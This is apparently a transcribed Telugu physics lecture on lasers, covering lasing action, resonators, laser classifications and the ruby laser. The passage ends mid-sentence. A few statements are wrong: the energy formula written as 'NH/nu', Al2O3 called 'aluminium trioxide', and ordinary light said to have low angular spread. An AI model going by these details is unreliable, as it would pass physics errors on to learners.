యొక్క ఎనర్జీ కూడా పెరుగుతుంది. ఎందుకంటే ఎనర్జీ ఈక్వల్స్ టు NH/nu. ఎప్పుడైతే N పెరిగిందో ఆటోమేటిక్గా E పెరుగుతుంది. ఎప్పుడైతే ఈ ఎనర్జీ లేదా ఇంటెన్సిటీ ఒక సఫిషియంట్ వాల్యూకి రీచ్ అయిన తర్వాత మనకి లేజర్ బీమ్ అనేది బయటికి ఎమిట్ అవుతుంది ఆ డివైస్ నుంచి. సో దిస్ ఈజ్ కాల్డ్ యాజ్ లేజింగ్ యాక్షన్. అయితే ఈ ఫిగర్లో మనం క్లియర్ కట్గా గమనించవచ్చు.
సో ఫస్ట్ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ ఎమిట్ అవుతుంది. ఈ ఫోటాను నెక్స్ట్ పార్టికల్ని స్టిమ్యులేట్ చేయడం వల్ల 2 ఫోటాన్స్ వస్తాయి. ఈ 2 ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతూ ఆటోమేటిక్గా ఫోటాన్స్ నెంబర్ పెరగడం వల్ల హై ఎనర్జీ బీము ఈ సైడ్ నుంచి మనకి లేజర్ రూపంలో బయటకు వస్తుంది. ఇందులో కూడా మనం డిఫరెంట్ ఈ మొత్తం చదువుకున్న ప్రాసెస్లన్నీ చూడొచ్చు. సో దిస్ ఈజ్ ఎగ్జైటెడ్ స్టేట్స్ ఆఫ్ ద ఆటమ్స్. ఈ ఎగ్జైటెడ్ స్టేట్స్లో నుంచి మనకి స్పాంటేనియస్ ఎమిషన్ వల్ల కొన్ని ఫోటాన్స్ వస్తాయి. ఈ స్పాంటేనియస్ ఎమిషన్ స్టిమ్యులేట్ ఎమిషన్ వల్ల మరికొన్ని ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఫైనల్గా ఈ ఫోటాన్స్ యొక్క నెంబర్ పెరగడం వల్ల లాస్ట్కి హై ఎనర్జీ ఫోటాన్ బీము ఈ రూపంలో మనకి బయటకు వస్తుంది. సో వాట్ ఆర్ ద ప్రాపర్టీస్ ఆఫ్ లేజర్? లేజర్కి డిఫరెంట్ ప్రాపర్టీస్ ఉన్నాయి. అందులో ఫస్ట్ ప్రాపర్టీ మోనోక్రోమిక్ ప్రాపర్టీ. మోనోక్రోమిక్ ప్రాపర్టీ ఏంటి? లేజర్కి సింగిల్ వేవ్ లెంత్ ఉంటుంది. రెండోది హైలీ కోహరెంట్, అంటే అందులో ఉన్న ఫోటాన్స్ అన్నీ కూడా ఒకే ఫేజ్లో ఉంటాయి. అయితే ఇక్కడ ఈ ఫిగర్లో కానీ మనం అబ్జర్వ్ చేయగలిగితే ఫస్ట్ది సన్లైట్. సన్లైట్ అనేది మనకందరికీ తెలిసిందే. ఇట్ ఈజ్ ఏ క్రోమాటిక్ లైట్ ఆర్ మల్టీ కలర్డ్ లైట్. ఇందులో 7 కలర్స్ ఉంటాయి కాబట్టి సన్లైట్కి ఉంటుంది. రెండో దానికి వచ్చేసరికి దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద ఎల్ఈడి. ఇది మోనోక్రోమాటిక్ అయినప్పటికీ కూడా ఇందులో ఉన్న లైట్ వేవ్స్ అన్నిటికి కూడా ఫేజ్ అనేది ఈక్వల్గా ఉండదు. కాబట్టి ఫేజ్ ఈక్వల్గా ఉండదు కాబట్టి ఆ బీమ్ని మనం ఇన్కోహరెంట్ అంటాము. అయితే లాస్ట్ది దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద లేజర్ బీమ్. ఈ లేజర్ బీమ్ నుంచి వస్తున్న లైట్కి సేమ్ వేవ్ లెంత్ ఉంటూ అదేవిధంగా అన్నీ కూడా సేమ్ ఫేజ్లో ఉండడం వల్ల ఇది మోనోక్రోమాటిక్ యాజ్ వెల్ యాజ్ హైలీ కోహరెంట్. అండ్ అనదర్ ఇంపార్టెంట్ ప్రాపర్టీ ఆఫ్ దిస్ లేజర్ బీమ్ ఈజ్ హై డైరెక్షనాలిటీ. అంటే దీనికి యాంగులర్ స్ప్రెడ్ అనేది చాలా తక్కువగా ఉంటుంది కనుక ఇది ఎంత దూరమైనా ఈజీగా ట్రావెల్ చేస్తుంది. అదేవిధంగా ఇది స్మాల్ ఏరియాలో హై ఎనర్జీని కూడా డిపాజిట్ చేస్తుంది, ఎందుకంటే దీని ఇంటెన్సిటీ ఎక్కువ. ఫర్ ఎగ్జాంపుల్ ఆర్డినరీ లైట్ సోర్స్ తీసుకుంటే ఈ ఆర్డినరీ లైట్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైట్ వేవ్స్కి యాంగులర్ స్ప్రెడ్ తక్కువగా ఉండడం వల్ల లేజర్ వేవ్స్ అనేవి చాలా ఎక్కువ దూరం ఎటువంటి నష్టం లేకుండా ప్రయాణించగలవు. దీన్నే మనం డైరెక్షనాలిటీ ప్రాపర్టీ కింద చెప్తాము. అయితే ఆర్డినరీ లైట్కి నెక్స్ట్ లేజర్ లైట్కి మధ్యన డిఫరెన్సెస్ మనం ఈ స్లైడ్లో క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు. ఆర్డినరీ లైట్లో మల్టీ కలర్స్ ఉంటే ఈ లేజర్ లైట్లో సింగిల్ కలర్డ్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో డిఫరెంట్ డైరెక్షన్స్లో ట్రావెల్ చేస్తుంటే కానీ లేజర్ లైట్కి సింగిల్ డైరెక్షన్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో ఇన్కోహరెంట్ బీమ్ అయితే ఇక్కడికి వచ్చేసరికి కోహరెన్స్. Okay, sir. Ready, sir? So next concept is different types of lasers. What are the different types of lasers which are studying? అయితే తెలుసుకునే ముందు మనకి లేజర్లో ఉన్న డిఫరెంట్ పార్ట్స్ ఏంటి, లేజర్లో ఖచ్చితంగా ఏ లేజర్లో తీసుకున్నా ఈ లేజర్లో 3 పార్ట్స్ ఉంటాయి. ఫస్ట్ వన్ యాక్టివ్ మీడియము, రెండోది ఎగ్జైటేషన్ మెకానిజం, మూడోది రెజొనేటర్. అయితే ఇందులో ఒక్కొక్క దాని గురించి మనం ఇండివిజువల్గా తెలుసుకుందాం. ఇందులో ఈ సెంటర్లో ఉన్నది యాక్టివ్ మీడియం. వాటిని పార్టికల్స్ని పంపింగ్ చేయడానికి ఈ ఎగ్జైటేషన్ మెకానిజం, అలాగే ఈ విధంగా మనకి హై ఇంటెన్సిటీ లేజర్ బీమ్ డెవలప్ అవ్వడానికి ఈ రెజొనేటర్స్ అనేవి వాడడం జరుగుతుంది. సో ఇందులో యాక్టివ్ మీడియం అంటే ఏంటి? యాక్టివ్ మీడియంలో మనకి పార్టికల్స్ ఉంటాయి. ఈ యాక్టివ్ మీడియంలో ఉన్న పార్టికల్స్ మనకి పంపింగ్ ప్రాసెస్లో ఎమిట్ అవుతున్న ఎనర్జీని అబ్జార్బ్ చేసుకొని ఎగ్జైట్ అయ్యి అవి మళ్ళీ స్టిమ్యులేటెడ్ ఎమిషన్స్కి లోన్ కావడం వల్ల మనకి ఫోటాన్స్ అనేవి ఎమిట్ అవ్వడం జరుగుతుంది. అయితే ఈ పార్టికల్స్ అనేవి ఏవైనా కావచ్చు. ఈ పార్టికల్స్ సాలిడ్స్ అవ్వచ్చు, లేదా లిక్విడ్స్ అవ్వచ్చు, లేదా గ్యాసెస్ అవ్వచ్చు, లేదా సెమీ కండక్టర్ మెటీరియల్ అయినా తీసుకోవచ్చు. నెక్స్ట్ వన్ ఆప్టికల్ పంపింగ్ మెకానిజం. ఎగ్జైటేషన్ మెకానిజంలో ఫస్ట్ వన్ అనేది మనకి ఆప్టికల్ పంపింగ్ మెకానిజం, రెండోది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం, మూడోది కెమికల్ పంపింగ్ మెకానిజం, అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్ మెకానిజం. ఈ పంపింగ్ మెకానిజం వల్ల మనకి అబ్జార్ప్షన్ కావాల్సిన ఎనర్జీ అనేది మనకి లభ్యమవుతుంది. అండ్ ద లాస్ట్ వన్ ఈజ్ రెజొనేటర్. ఈ రెజొనేటర్ దేనికి ఉపయోగపడుతుంది? లేజింగ్ యాక్షన్ జరగడానికి ఈ రెజొనేటర్ అనేది మనకు ఉపయోగపడుతుంది. అయితే ఇందులో ఏం జరుగుతుంది? ఈ లేజింగ్ యాక్షన్ వల్ల హై ఎనర్జీ లేజర్ బీమ్ అనేది బయటకు వస్తుంది.
అయితే ఈ అరేంజ్మెంట్లో ఏముంటాయి, 2 మిర్రర్స్ ఉంటాయి. ఒకటి పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ మిర్రరు, ఇంకొకటి పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్. సో ఈ పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి మనకి లేజర్ బీమ్ అనేది బయటికి రావడం జరుగుతుంది. లేజర్ బీమ్కి ఒక ఇంటెన్సిటీ రీచ్ అయిన తర్వాత అది ఈ పార్షియల్ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి బయటికి ఎమిట్ అవుతుంది. సో ఇందులోకి వచ్చేసరికి డిఫరెంట్ టైప్స్ ఆఫ్ రెజొనేటర్స్ మనం ఈ స్లైడ్లో చూపిస్తున్నాం. ఇందులో ఫస్ట్ దాంట్లో 2 కూడా ప్లేన్ మిర్రర్స్ ఉన్నాయి. ఆ 2 ప్లేన్ మిర్రర్స్ మధ్య డిస్టెన్స్ సెల్, కాబట్టి ఇది ప్లేన్ ప్యారలల్ రెజొనేటర్. రెండో దాంట్లోకి వచ్చేసరికి ఈ 2 ప్లేన్ మిర్రర్స్ కాకుండా స్పెరికల్ మిర్రర్స్ వాడడం జరిగింది. వీటి యొక్క రేడియస్ ఆఫ్ కర్వేచర్ 2 ఈక్వల్గా ఉంటూ రెండిటి వాల్యూస్ ఆ డిస్టెన్స్ మధ్య ఆ 2 మధ్య ఉన్న డిస్టెన్స్కి హాఫ్ ఉంటుంది, దట్ ఈస్ L/2. సో ఇటువంటి దాన్ని మనం కాన్సెంట్రిక్ రెజొనేటర్ అంటాము. మూడో దానిలోకి వచ్చేసరికి ఒకదాని రేడియస్ ఆఫ్ కర్వేచర్ L అయితే రెండో దానిది కూడా L అవుతుంది. ఇటువంటి దాన్ని మనం కాన్ఫోకల్ రెజొనేటర్ అంటున్నాము. లాస్ట్ వన్ ఒక దాంట్లో ప్లేన్ మిర్రర్ వాడాము, ఇంకో దాంట్లో రేడియస్ ఆఫ్ కర్వేచర్ L కలిగిన ఇంకొక మిర్రర్ వాడాము, దీన్ని హెమిస్పెరికల్ అంటున్నాము. లాస్ట్ వన్కి వచ్చేసరికి ఒకటి రేడియస్ ఆఫ్ కర్వేచర్ L అయితే ఇంకొకటిది రేడియస్ ఆఫ్ కర్వేచర్ L-R1. సో ఈ రెండింటి మధ్య ఉన్న రెజొనేటర్ మనం కాన్వెక్స్ కాన్కేవ్ రెజొనేటర్ అంటున్నాము. సో ఇటువంటి రెజొనేటర్స్ ఏవైనా వాడుతూ మనం లేజర్ని అనేది తయారు చేయొచ్చు. సో ఇప్పుడు లేజర్లో డిఫరెంట్ టైప్స్ ఉన్నాయి. ఈ టైప్స్ని వేరియస్ ఫ్యాక్టర్స్ కింద మనం వాటిని డివైడ్ చేయొచ్చు. సో ఫస్ట్ వన్ ఏంటి, అందులో ఉన్న మీడియం ఏంటి, యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అలాగే అందులో వాడిన ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద థర్డ్ వన్ అనేది వచ్చే అవుట్పుట్ మీద డిపెండ్ అవుతూ కూడా లేజర్స్ని డివైడ్ చేయొచ్చు. అదేవిధంగా అందులో వాడే లెవెల్ సిస్టమ్ మీద కూడా మనం వాడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద లాస్ట్ వన్ వేవ్ లెంత్ మీద కూడా డిపెండ్ అవుతూ మనం లేజర్స్ని డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని ఎన్ని టైప్స్ కింద డివైడ్ చేయొచ్చు. యాక్టివ్ మీడియం కింద ఆధారపడుతూ లేజర్స్ని మనం డిఫరెంట్ టైప్స్ కింద చేయొచ్చు. అందులో ఫస్ట్ వన్ సాలిడ్ స్టేట్ లేజర్, అంటే అందులో వాడే సబ్స్టెన్సెస్ అన్నీ కూడా సాలిడ్ స్టేట్లో ఉంటాయి. ఎగ్జాంపుల్ రూబీ లేజర్. రెండోది లిక్విడ్ వచ్చే లేజర్స్ని గ్యాస్ లేజర్స్ అంటున్నాము. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. అండ్ ద లాస్ట్ వన్ ఈ సెమీ కండక్టర్ లేజర్. ఇందులో మనం సెమీ కండక్టర్ మెటీరియల్స్ వాడతాము. ఎగ్జాంపుల్ గ్యాలియం ఆర్సెనైడ్ లేజర్. అదేవిధంగా ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని 4 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ రూబీ లేజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జ్ వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. మూడోది కెమికల్ రియాక్షన్స్ వల్ల వచ్చే లేజర్, ఎగ్జాంపుల్ కెమికల్ లేజర్. అండ్ ద లాస్ట్ వన్ థర్మల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజర్ని మనం థర్మల్ ఎగ్జైటేషన్ మెకానిజం ఎంప్లాయిడ్ లేజర్ అంటున్నాము. దీనికి ఎగ్జాంపుల్ CO2 లేజర్. అదేవిధంగా వచ్చే లేజర్ అవుట్పుట్ మీద డిపెండ్ అవుతూ లేజర్స్ని 2 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అవుట్పుట్ కనుక పల్సెస్ రూపంలో ఉంటే వచ్చే లేజరు పల్సర్ లేజర్, ఎగ్జాంపుల్ రూబీ లేజర్. అదేవిధంగా అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తే దాన్ని కంటిన్యూస్ లేజర్ కింద చెప్తాము, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ అందులో మనకి లేజింగ్ యాక్షన్ అనేది ఏ లెవెల్స్ మధ్య జరుగుతుంది, అందులో ఎన్ని లెవెల్స్ ఎంప్లాయ్ అయ్యాయి, ఆ ఎనర్జీ లెవెల్స్ మీద డిపెండ్ అవుతూ లేజర్స్ని 3 టైప్స్ కింద డివైడ్ చేయొచ్చు. అందులో 2 లెవెల్స్ కనుక మనం వాడితే దాన్ని 2 లెవెల్ లేజర్ సిస్టమ్ అంటాము. దానికి ఎగ్జాంపుల్ మేజర్, అమోనియా మేజర్. అదేవిధంగా అందులో 3 లెవెల్స్ లేజర్ ఎనర్జీ లెవెల్స్ ఎంప్లాయ్ అయితే దానికి ఎగ్జాంపుల్ 3 రూబీ లేజర్. అదేవిధంగా 4 లెవెల్ లేజర్స్ ఎంప్లాయ్ అయితే దాన్ని మనం 4 లెవెల్ లేజర్ కింద చెప్తాము, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. బేసింగ్ అపాన్ వేవ్ లెంత్, బయటకు వచ్చే అవుట్పుట్ యొక్క వేవ్ లెంత్ ఏ వాల్యూ కలిగి ఉంది దాని మీద డిపెండ్ అవుతూ మనం లేజర్స్ని 6 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ విజిబుల్ రీజియన్లో ఉంటే విజిబుల్ రీజియన్ లేజర్స్ అంటాము, ఎగ్జాంపుల్ రూబీ లేజర్. అది కాకుండా ఐఆర్ రీజియన్లో ఉంటే ఐఆర్ రీజియన్ లేజర్స్ అంటాము, దానికి ఎగ్జాంపుల్ CO2 లేజర్. నెక్స్ట్ యూవీ రీజియన్లో ఉంటే దాన్ని మనం యూవీ రీజియన్ లేజర్స్ అంటాము, ఎగ్జాంపుల్ గ్యాలియం నైట్రైడ్ లేజర్. అదేవిధంగా మైక్రోవేవ్ రీజియన్లో ఉంటే మేజర్స్ అంటాము, దానికి ఎగ్జాంపుల్ అమోనియా మేజర్. అండ్ ఎక్స్రే రీజియన్లో ఉంటే వచ్చే లేజర్స్ మనకి హైలీ అయనైజ్డ్ ప్లాస్మా లేజర్స్. సో ఈ విధంగా మనం డిఫరెంట్ క్లాసెస్ కింద వేవ్ లెంత్ మీద డిపెండ్ అవుతూ డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ మనకి సిలబస్లో 2 లేజర్స్ ఉన్నాయి, ఒకటి రూబీ లేజరు, ఇంకోటి హీలియం నియాన్ లేజర్. అందులో ఫస్ట్ వన్ మనం తీసుకుంటే రూబీ లేజర్. రూబీ లేజర్ అనేది ఇది సాలిడ్ స్టేట్ లేజర్. రెండోది ఇందులో వచ్చే అవుట్పుట్ పల్సర్ రూపంలో ఉంటుంది కాబట్టి ఇది పల్సర్ లేజర్. ఇందులో వాడే ఎగ్జైటేషన్ మెకానిజము ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం. అండ్ ఇందులో మనకి 3 లెవెల్స్ లేజర్స్ అనేవి
ఉంటాయి కాబట్టి దీన్ని మనం 3 లేయర్ లేజర్ కింద చెప్పొచ్చు. అదేవిధంగా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది కాబట్టి ఇది విజిబుల్ రీజియన్లో ఉన్న పనిచేసే లేజర్ కింద చెప్పుకోవచ్చు. అయితే రూబీ లేజర్లో ఉండే పార్ట్స్ ఏంటి? ఈ రూబీ లేజర్ని ఫస్ట్ తయారు చేసింది మైమన్ అనే సైంటిస్టు, అది 1960లో. అయితే ఇందులో ఇదే కలర్లో ఉంటుంది, ఇది పింక్ కలర్లో ఉంటుంది. వాట్ ఈస్ ద కెమికల్ నేమ్ ఆఫ్ దిస్ రూబీ లేజర్? దీని కెమికల్ నేము Al2O3 అల్యూమినియం ట్రైఆక్సైడ్. కాకపోతే అందులో కొంత క్రోమియం ఆక్సైడ్ కూడా కలిసి ఉంటుంది. ఎంత పర్సెంటేజ్ కలిసి ఉంటుంది? 0.2 నుంచి 0.5% క్రోమియం ఆక్సైడ్ కలిసి ఉంటుంది. ఈ క్రోమియం ఆక్సైడ్ వల్లే ఆ రూబీ లేజర్కి ఆ కలర్. సో క్రోమియం ఆక్సైడ్ యొక్క పర్సెంటేజ్ పెరిగితే దాని కలర్ యొక్క ఇంటెన్సిటీ కూడా పెరుగుతుంది. అయితే ఇందులో యాక్టివ్ మెటీరియల్ ఏంటి? 2 మెటీరియల్స్ ఉన్నాయి. ఒకటి క్రోమియం ఆక్సైడ్ ఉంది, అదేవిధంగా అల్యూమినియం ట్రైఆక్సైడ్ ఉంది. కాకపోతే ఈ రెండిట్లో యాక్టివ్ మెటీరియల్ ఏంటంటే మనకి క్రోమియం అయాన్స్ అనేవి యాక్టివ్ మెటీరియల్ ఈ లేజర్లో. మరి అల్యూమినియము అదేవిధంగా ఆక్సిజన్ యాటమ్స్ అనేవి అవి యాక్టివ్గా ఉండవు, ఇన్యాక్టివ్గా ఉంటాయి, అంటే అవి ఇనర్ట్ మెటీరియల్స్. సో ఈ ఫిగర్లో మనం కానీ క్లియర్గా అబ్జర్వ్ చేస్తే దిస్ ఈజ్ ద రూబీ రాడ్ అండ్ దిస్ ఈజ్ ద ఆప్టికల్ పంపింగ్ మెకానిజం, అదేవిధంగా ఇది రెజొనేటర్. సో ఈ రూబీ లేజర్లో వాడే 3 పార్ట్స్ ఇక్కడ మనం క్లియర్గా ఈ ఫిగర్లో మనం అబ్జర్వ్ చేయొచ్చు. సో రూబీ క్రిస్టల్ ఏ రూపంలో తీసుకుంటాం? ఒక సిలిండ్రికల్ రాడ్ రూపంలో తీసుకుంటాం. దాని లెంత్ ఎంత? 4 సెంటీమీటర్స్ లెంత్, అదేవిధంగా డయామీటర్ 0.5 సెంటీమీటర్స్. నెక్స్ట్ ఈ రూబీ రాడ్ యొక్క 2 ఎండ్స్ కూడా మనం పర్ఫెక్ట్గా ప్యారలల్గా ఉండే విధంగా మనం వాటిని అరేంజ్ చేయడం జరుగుతుంది. అదేవిధంగా వాటిని హైలీ పాలిష్డ్ చేస్తాం. హైలీ పాలిష్డ్ చేసిన తర్వాత ఆ 2 ఎండ్స్ని కూడా మనం సిల్వర్ కలర్ అనేది వేయడం జరుగుతుంది. వేయడం వల్ల ఏమవుతుందంటే ఒక సైడ్ ఫుల్లీ రిఫ్లెక్టింగ్ అవుతుంది, అదర్ సైడ్ అనేది పార్షల్ రిఫ్లెక్టింగ్ అయ్యే విధంగా వాటిని మనం సిల్వర్గా ఉండే విధంగా తయారు చేస్తాం. అయితే ఈ రూబీ లేజర్ చుట్టూ హెలికాన్ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది అరేంజ్ చేయడం జరుగుతుంది. ఈ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది మనకి పంపింగ్ సోర్స్ కింద మనం అబ్జర్వ్ చేయొచ్చు. సో ఈ ఫిగర్లో మనకి క్లియర్గా ఇందులో వాడే పార్ట్స్ అన్ని కనబడుతున్నాయి. ఇది పవర్ సప్లై విచ్ ఈజ్ కనెక్టెడ్ టు ద హెలికల్ జీనాన్ ఫ్లాష్ ల్యాంప్. అదేవిధంగా సెంటర్లో ఉన్న పింక్ కలర్ది రూబీ రాడు. నెక్స్ట్ ఈ ఎండ్స్ కూడా 2 ఎండ్స్ కూడా ఒకటి పార్షియల్లీ రిఫ్లెక్టింగ్, ఈ చివరి ఎండ్ పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ ప్లేట్. ఈ మొత్తం డివైస్ అంతా కూడా ఒక స్టీల్ ఒక మెటల్ కంటైనర్లో మనం దీన్ని ప్రొటెక్ట్ చేయడం జరుగుతుంది. నెక్స్ట్ హౌ దిస్ రూబీ లేజర్ ఈజ్ వర్కింగ్? ఎప్పుడైతే జీనాన్ ఫ్లాష్ ల్యాంప్ ఆన్ అయిందో దాని నుంచి వస్తున్న ఎనర్జీని ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకుని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. సో క్రోమియం అయాన్స్ యొక్క గ్రౌండ్ స్టేట్ ఈవెన్ స్టేట్ అయితే ఈ హెలికల్ జీనాన్ ల్యాంప్ నుంచి వస్తున్న ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్స్ అయినటువంటి ఈ స్టేట్స్కి వెళ్ళడం జరుగుతుంది ఎలక్ట్రాన్. సో అక్కడికి వెళ్ళిన ఎలక్ట్రాను తిరిగి కొంత సమయం తర్వాత అంటే ఆఫ్టర్ ఇట్స్ లైఫ్ టైమ్ దే విల్ బి రిలీజింగ్ ద ఎనర్జీ అండ్ దే విల్ బి కమింగ్ టు ద స్టేట్ E2 స్టేట్ అనేది దానికి మెటాస్టేబుల్ స్టేట్. ఎందుకంటే అక్కడ లైఫ్ టైం చాలా ఎక్కువగా ఉంటుంది కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ వాటంతట అవి కిందికి రావు. సో పంపింగ్ ప్రాసెస్ జరుగుతున్నంతసేపు ఈ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్స్ ఎనర్జీని లాస్ అవుతూ మళ్ళీ E2 స్టేట్కి వస్తున్నాయి. E2 స్టేట్ నుంచి ఏ ఎలక్ట్రాన్ కూడా కిందికి రాదు. ఈ క్రోమియం అయాన్ అనేది కిందికి రాదు. క్రోమియం అయాన్ కిందికి రాకపోవడం వల్ల ఏమవుతుందంటే ఇక్కడ నెంబర్ అనేది పెరుగుతుంది. నెంబర్ పెరగడం వల్ల పాపులేషన్ అనేది ఇన్వర్షన్ అనేది అచీవ్ అవ్వడం జరుగుతుంది. సో పాపులేషన్ ఇన్వర్షన్ అచీవ్ అయిన తర్వాత ఇక్కడ పార్టికల్స్ యొక్క నెంబర్ పెరగడం వల్ల ఏదో ఒక పార్టికల్ క్రోమియం పార్టికల్ ఎనర్జీని లాస్ అవుతూ కిందికి రావడానికి మనకి మ్యాక్సిమం ప్రాబబిలిటీ ఉంటుంది. ఆ ప్రాబబిలిటీ వల్ల ఒక స్పాంటేనియస్ ఎమిషన్ జరిగి ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక క్రోమియం అయాను ఒక ఫోటాన్ని ఎమిట్ చేస్తూ ఈ లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో రిలీజ్ అయిన ఫోటాను మెటాస్టేబుల్ స్టేట్లో ఉన్న మిగతా క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి అక్కడున్న ఈ క్రోమియం అయాన్స్ అన్నింటినీ కూడా గ్రౌండ్ స్టేట్కి స్టిమ్యులేటెడ్ ఎమిషన్ ప్రాసెస్ ద్వారా కిందకు వస్తాయి. సో స్టిమ్యులేటెడ్ ఎమిషన్ ప్రాసెస్ వల్ల మనకి ఇంకొక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. సో ఈ రెండు ఫోటాన్స్ రాడ్ యొక్క లెంత్ వెంబడి ప్రయాణిస్తూ మనకి మిగతా ఫోటాన్స్ని కూడా స్టిమ్యులేట్ చేస్తాయి. ఇందులో ఈ రెడ్ కలర్వి మనకి క్రోమియం అయాన్స్ అయితే ఎగ్జైటెడ్ స్టేట్లో ఉన్న క్రోమియం అయాన్స్ అయితే ఈ వైట్ యారోస్ మనకి ఫోటాన్స్. ఈ ఫోటాన్స్ ఏం చేస్తున్నాయంటే ఈ రెడ్ కలర్లో ఉన్న క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి వాటిని స్టిమ్యులేట్ చేసి
వాటిని వల్ల గ్రౌండ్ స్టేట్కి తీసుకురావడం వల్ల ఫోటాన్స్ యొక్క నెంబరు గ్రాడ్యువల్గా పెరుగుతుంది. ఎప్పుడైతే ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతుందో ఆటోమేటిక్గా చైన్ రియాక్షన్ జరుగుతుంది. చైన్ రియాక్షన్ జరగడం వల్ల మనకి లోపల లేజర్ ఇంటెన్సిటీ కూడా పెరుగుతుంది. ఈ లేజర్ ఇంటెన్సిటీ ఎప్పుడైతే ఒక పర్టికులర్ వాల్యూని రీచ్ అయిందో అప్పుడు మనకి ఈ పార్షియల్ రిఫ్లెక్టింగ్ సైడ్ నుంచి వేవ్ లెంత్ 694.3 నానోమీటర్స్ కలిగిన వేవ్ లెంత్ రూపంలో లేజర్ లైట్ అనేది బయటకు వస్తుంది. అయితే మనకి ఇక్కడ స్పాంటేనియస్ ఎమిషన్లో ఎమిట్ అయిన ఫస్ట్ ఫోటాను ఈ ప్రాసెస్ అంతటినీ ట్రిగ్గర్ చేస్తుంది. అయితే ఈ రూబీ లేజర్ మనకి ఎక్కడెక్కడ అప్లై అవుతుంది? ఫస్ట్ వన్, ఇట్ ఈస్ యూజ్డ్ ఫర్ ప్రొడ్యూసింగ్ షార్ట్ లేజర్ పల్సెస్. అదేవిధంగా హోలోగ్రాఫిక్ పోర్ట్రైట్స్ని మనం తయారు చేయడంలో ఉపయోగపడుతుంది. లాస్ట్ వన్, హోలోగ్రామ్స్ ఆఫ్ లార్జ్ ఆబ్జెక్ట్స్ని తయారు చేయడంలో ఉపయోగపడుతుంది. అదేవిధంగా మన టాటూస్ కానీ హెయిర్ రిమూవల్ ప్రాసెస్లో కానీ ఈ రూబీ లేజర్స్ అప్లికేషన్స్ అనేవి చాలా విరివిగా ఉన్నాయి. అయితే రూబీ లేజర్స్లో ఉన్న డ్రాబ్యాక్ ఏంటి? దీనిలో ఉన్న మెయిన్ డ్రాబ్యాక్ ఏంటంటే ఇది పల్స్డ్ లేజర్, ఇది కంటిన్యూస్ లేజర్ కాదు. నెక్స్ట్ ఇందులో వాడేది హై పంపింగ్ పవర్ కావాలి. నెక్స్ట్ అదేవిధంగా దీనికి ఎఫిషియన్సీ కూడా చాలా తక్కువ. నెక్స్ట్ ఇందులో రూబీ రాడ్ అనేది క్రిస్టలైన్ రూపంలో ఉంటుంది కాబట్టి క్రిస్టలైన్ ఇంపర్ఫెక్షన్స్ కూడా ఉండడం వల్ల కొన్ని డిఫెక్ట్స్ అనేవి ఉంటున్నాయి. లాస్ట్ వన్, ఇందులో హై ఎనర్జీ మనకి జీనాన్ ఫ్లాష్ ల్యాంప్ ఇచ్చినప్పటికీ కూడా ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకునే ఎనర్జీ చాలా తక్కువగా ఉంటుంది. అంటే మిగతా ఎనర్జీ కూడా మొత్తం ఆపరేటస్ అంతటిని హీట్ చేయడానికి ఉపయోగపడుతుంది. కనుక ఖచ్చితంగా ఈ ఆపరేటస్లో మనం కూలింగ్ 